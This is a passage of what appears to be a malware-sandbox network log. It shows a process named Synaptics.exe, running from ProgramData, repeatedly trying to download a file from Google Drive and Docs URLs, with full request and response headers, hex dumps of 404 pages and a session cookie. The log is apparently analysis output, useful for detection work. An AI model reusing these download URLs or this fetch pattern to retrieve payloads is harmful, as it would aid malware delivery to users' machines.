                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7OdJCWS8GWAEHBcwq9-Px8Yju_OnCITaRhviMQbE3wSvaOxGaTnhi9cgRPSTnDoLf6kj_QWqc
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:29 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-f_QRoN-R3_X3EOI7Zi64Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 4d 45 41 73 33 51 32 6b 76 73 70 75 5a 4f 41 51 45 49 7a 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="cMEAs3Q2kvspuZOAQEIzQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              119192.168.2.449909142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6xaSrhQGJ7C45JGhr4iSRwnGFFyeotzcyAm2_ZFNOGcUZasMQ1ePeTyeS8GUt0BlQq
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:29 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-GsATE1Ush8VDnI0-lNqljg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 78 57 58 6a 64 68 57 42 54 35 57 2d 48 53 71 56 4d 62 5a 58 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="5xWXjdhWBT5W-HSqVMbZXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              120192.168.2.449906142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:29 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-qROhThQ6B9FoF5KN1Q_ERg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              121192.168.2.449910142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:30 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--vIuT3sI1IGFIQn0QfRR0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              122192.168.2.449911142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:30 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-t0qkEDkeUR5s12yxOkfD7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              123192.168.2.449912142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5WqrzH-iPZTlEjnXDTWu7TyS72tZNy28xrTz2JtzN-hadObIFDR7nOeXLbLfPfjclDweZMlE4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:30 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-r3eitq1jYeCaWXAZSPMktQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 51 51 6a 4d 33 6d 43 74 49 37 55 66 6a 44 4c 4f 49 4d 30 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="AQQjM3mCtI7UfjDLOIM0XA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              124192.168.2.449913142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7Fqi1WEa4vOyMmeEVhklbldU-zCzDqQFLefD4J-3jXHsEGqS0aWAZ9weZ2mspWs8nu
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:30 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-QYOnLRHkUscQmDqoGKOnXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:30 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:30 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 77 53 70 66 71 39 37 62 79 4d 56 2d 4c 35 39 74 64 34 73 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
